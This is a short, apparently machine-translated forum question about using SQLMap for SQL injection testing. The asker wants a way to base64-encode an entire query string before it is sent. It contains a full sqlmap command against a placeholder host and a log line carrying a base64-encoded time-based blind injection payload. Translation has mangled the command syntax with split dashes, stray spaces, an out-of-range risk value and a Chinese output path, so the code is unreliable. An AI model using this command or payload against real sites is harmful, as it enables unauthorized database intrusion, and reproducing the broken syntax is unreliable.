使用SQLMap测试sql注入:
python sqlmap.py -v 2 --url ='http://test.com/process.php?pre_email=tess@test.com&pinfos=2.95|3|29.95|30|38bbca71c4353610510db4eda8cc5bb3' - user-agent = SQLMAP --delay = 1 --tamper = tamper / base64encode.py --timeout = 15 --retries = 2 --keep-alive --threads = 5 --eta --batch --dbms = MySQL --os = Linux --level = 5 --risk = 4 --banner --is-dba --dbs - -tables --technique = BEUST -s output / scan_report.txt --flush-session -t output / scan_trace.txt --fresh-queries>输出/ scan_out.txt
我收到了这个请求:
[01 /月/ 2013:17:16:20 -0400]“GET /process.php?pre_email=ZG9ubGltODJAaG90bWFpbC5jb20nIEFORCAzMTI4PUJFTkNITUFSSyg1MDAwMDAwLE1ENSgweDRkNDY2ZjQ5KSkgQU5EICdsbXdDJyBMSUtFICdsbXdD&pinfos=2.95%7C3%7C29.95%7C30%7C38bbca71c4353610510db4eda8cc5bb3
我想要的是:
[01 / Nov / 2013:17:16:20 -0400]“GET /process.php?cHJlX2VtYWlsPXRlc3NAdGVzdC5jb20mcGluZm9zPTIuOTV8M3wyOS45NXwzMHwzOGJiY2E3MWM0MzUzNjEwNTEwZGI0ZWHhOGNjNWJiMw ==
sqlmap base64可以在发送之前对完整的查询字符串进行编码吗?篡改base64脚本只对有效负载进行编码,该有效负载是单个变量而不是完整的查询字符串。
THX